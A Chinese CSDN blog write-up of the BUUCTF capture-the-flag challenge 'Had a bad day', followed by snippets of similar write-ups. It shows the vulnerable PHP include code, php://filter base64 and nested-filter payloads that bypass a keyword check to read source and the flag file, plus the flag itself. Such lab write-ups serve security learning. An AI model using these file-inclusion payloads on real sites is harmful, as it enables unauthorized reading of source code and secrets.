web buuctf [ Had a bad day]

最新推荐文章于 2023-04-06 19:36:28 发布
最新推荐文章于 2023-04-06 19:36:28 发布
阅读量636 收藏
点赞数
文章标签: 伪协议嵌套 文件包含
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44214568/article/details/123797002
版权

考点:伪协议嵌套(伪协议的过滤器嵌套)

1.

打开页面,url上有get传参,category=

2.尝试注入,1' ,1' or '1=1' 都不行,没有数据库报错

 3.尝试文件包含,利用php伪协议,尝试读取index.php,令category=php://filter/read=convert.base64-encode/resource=index.php

 根据提示,可以看出确实是文件包含,利用了include函数,include函数在没有找到文件时会爆出警告,有可能是文件名字的问题,我们看到后面爆的是index.php.php,所以后台应该是又添加了一个php,

改payload=php://filter/read=convert.base64-encode/resource=index,

得到源文件,进行base64解码,得到代码

 <?php
				$file = $_GET['category'];

				if(isset($file))
				{
					if( strpos( $file, "woofers" ) !==  false || strpos( $file, "meowers" ) !==  false || strpos( $file, "index")){
						include ($file . '.php');
					}
					else{
						echo "Sorry, we currently only support woofers and meowers.";
					}
				}
				?>

(strpos()查找字符串在另一字符串中第一次出现的位置)

4.可以看出传递的参数里必须有这三个中的一个,

可以利用伪协议的嵌套

伪协议的嵌套实际上就是过滤器的嵌套

 所以可以构造payload=php://filter/index/resource=flag

需要读,加过滤器read:php://filter/index/read=convert.base64-encode/resource=flag 

对得到的base64码,进行解码后得到flag

flag{1208b24e-b193-4f88-8596-9569fff50d75}

 

 

半杯雨水敬过客
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
buu做题笔记——[WUSTCTF2020]朴实无华&[BSidesCF 2020]Had a bad day
weixin_46330722的博客
11-07 456
BUU[WUSTCTF2020]朴实无华robots.txtresponselevel 1level 2level 3[BSidesCF 2020]Had a bad day [WUSTCTF2020]朴实无华 robots.txt 进入题目界面就一个Hack me,抓包也没看到啥有用的。dirsearch开启 ! 扫一扫有没有什么有用的,但是全都429,只能手动扫描了。备份文件,git泄露,robots协议…全都试一遍 。终于在robots.txt里找到了有用的东西。 response 访问是一个有
hada-p3
03-27
hada-p3
buuctf-had a bad day
bin789456的博客
02-02 1885
WP 主要考点为伪协议和目录穿越 url本身就很可以,探测一下 出现报错信息,可以看出来是一个文件包含 include 同时会给你自动加上php的后缀 显然,直接包含flag不太行。index.php啥的还可以,应该是有waf 还可以利用相对路径来探测(这里应该是出题人的思路)也就是目录穿越 因为之前的报错能够知道现在的目录结构,当前是在index.php下,上一层目录多半有flag文件(不行就只有多找找了) 正常回显了 也看到了提示 然后就是伪协议探测 读文件就是filter,这里就不说inpu
BUUCTF之Had a bad day
dwrnxjlove的博客
08-14 975
Had a bad day 打开题目是一个简洁的页面页面上有两个按钮 看一下这个网页实现的功能,随便点击一个按钮 显示了一张图片,并且我们可以发现通过Get的方式穿进去一个参数,大概可以猜出,这个网页是通过get传进去一个参数然后在后台进行查询,到这我最先想到的是sql注入,于是进行了尝试、 http://a854196a-76a8-4258-9088-973ab48d7722.node4.buuoj.cn:81/index.php?category=woofers%27 #加入单引号测试是否存在注入
buuctf-Had a bad day文件包含
m0_62094846的博客
11-21 827
两个按钮随便点一个 看样子有点像文件包含 ?category=php://filter/read=convert.base64-encode/resource=woofers base64解密后得到代码 但这只是说明了图片大小,没有用 应该用这个 ?category=php://filter/read=convert.base64-encode/resource=index 不能加.php,会报错 解密可以得到html代码 <html> <hea...
buuctf-[BSidesCF 2020]Had a bad day(小宇特详解)
小宇的web博客
02-16 4404
buuctf-[BSidesCF 2020]Had a bad day(小宇特详解) 先看一下题目 这里上面有注入点,这里怀疑是SQL注入 先尝试读取一下index.php 这里使用php伪协议 payload: php://filter:/convert.base64-encode/resource=index.php 存在文件包含漏洞,但是这里报错了,分析之后是无法打开流:操作失败 这里去除php后缀 payload php://filter/convert.base64-encode/reso
六年级英语上册 Unit 7 I had a bad day.第一课时教案 广东版开心.doc
10-13
小学教案
六年级英语上册 Unit 7 I had a bad day.第三课时教案 广东版开心.doc
10-13
小学教案
hada-p2
03-13
hada-p2
HADA protocol-开源
04-28
用于实现用于序列比对的分层注释相关比对(HADA)协议的脚本以及相关功能。
buuctf web had a bad day
qq_41696858的博客
12-16 1614
这题应该是入门送分题 打开场景,两个超链接,点进去,有猫有狗,带了一个category参数,后面是超链接名字 盲猜是任意文件读取,审计源码 发现了hint <div class="page-include"> 那就说明我们的思路没问题,干就完了 尝试http://10b59fde-8bbb-479a-9ec5-103defcf5b60.node4.buuoj.cn:81/index.php?category=php://filter/convert.base64-encode/resourc
buuctf had a bad day 解析
qq_73722777的博客
04-06 321
从这里可以看到这里是使用strpos函数查找了关键字,file变量中必须包含woofers,meowers和index中其中一种。发现报错,于是我们尝试读取index.php的信息(会自动加.php,所以只用写index就行了)于是猜测后面的category变量进行了文件包含,我们在后面加上‘尝试使其报错。说明网页进行了过滤,于是我们尝试使用目录穿越查看上一级是否有我们需要的文件。在源代码的这里我们找到一个提示,于是说明这一级文件中有我们需要的flag。打开靶机,我们发现有两个按钮。交互之后网址发生改变。
BUUCTF:Had a bad day
../../../../../../../
06-09 751
打开随意选择一个选项可以看到 怀疑是sql注入或者是文件包含,随便输入一个值返回php报错: 从图中可以知道是文件包含漏洞 先用php://filter伪协议读一下index.php源码看一下 php://filter/read=convert.base64-encode/resource=index (这里构造成 php://filter/read=convert.base64-encode/resource=index.php 是会报错的,因为后端给文件拼接了 “.php” ) 可以得到一串b
BUUCTF之[BSidesCF 2020]Had a bad day --- 文件包含漏洞
weixin_44632787的博客
06-22 988
BUUCTF之[BSidesCF 2020]Had a bad day 题目 点击下面的那两个按钮的时候,发现图片会变化。而且链接上的值也是跟着变化。(看上去像是文件包含的题目) 点击链接的时候只是category=后面的值改变,使用盲猜是文件包含漏洞。所以试试?category=flag.php 好吧,可能是攻击的方式不对。换换其它的: ?category=flag.php # 失败 ?category=flag # 失败 ?category=php://filter/read=co
BUUCTF:[BSidesCF 2020]Had a bad day
末初的CSDN博客
03-30 5293
BUUCTF:[BSidesCF 2020]Had a bad day 可能存在SQL注入或者文件包含,在我尝试读取index.php源码的时候出现了报错信息 的确是文件包含,但是有index.php却读取错误,报错显示无法打开流:操作失败在后面测试的时候,发现除掉后缀即可读取到源码 base64解码读取源码 <?php $file = $_GET['category']; ...
[BSidesCF 2020]Had a bad day
SopRomeo的博客
05-16 3141
随便点一个试试 观察url,猜测sql注入 测试 弹出include报错,那就是文件包含了 直接读index的源码 payload ?category=php://filter/read=convert.base64-encode/resource=index 观察代码,传入的参数要含有woofers或meowers或index才可以调用include() 打ctf打多了,可以确定flag就在flag.php里头了 虽然上面必须包含woofers或meowers或index 但是php伪协议可以套一
第四十八题——[BSidesCF 2020]Had a bad day
分享简单的安全技术
04-27 362
题目地址:https://buuoj.cn/challenges 解题思路 第一步:进入题目,两个按钮,点击任意一个均出现一张照片,且URL参数提交相应的值 第二步:利用php:filter读取index.php发现出错 php://filter/convert.base64-encode/resource=index.php 第三步:去掉.php后缀名后成功获取到源码的base64值,解码后得到源码 <?php $file = $_GET['category']; if(isset(
Fern couldn't eat until her pig had had a drink of milk.中的两个had是什么意思
最新发布
04-21
这个句子中的两个“had”都是动词“have”的过去分词形式,第一个是“had had”,表示发生在过去的过去,意为“已经喝过”,第二个是“had”,表示过去完成时,意为“已经有了”。整个句子的意思是:“在猪喝了一口...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值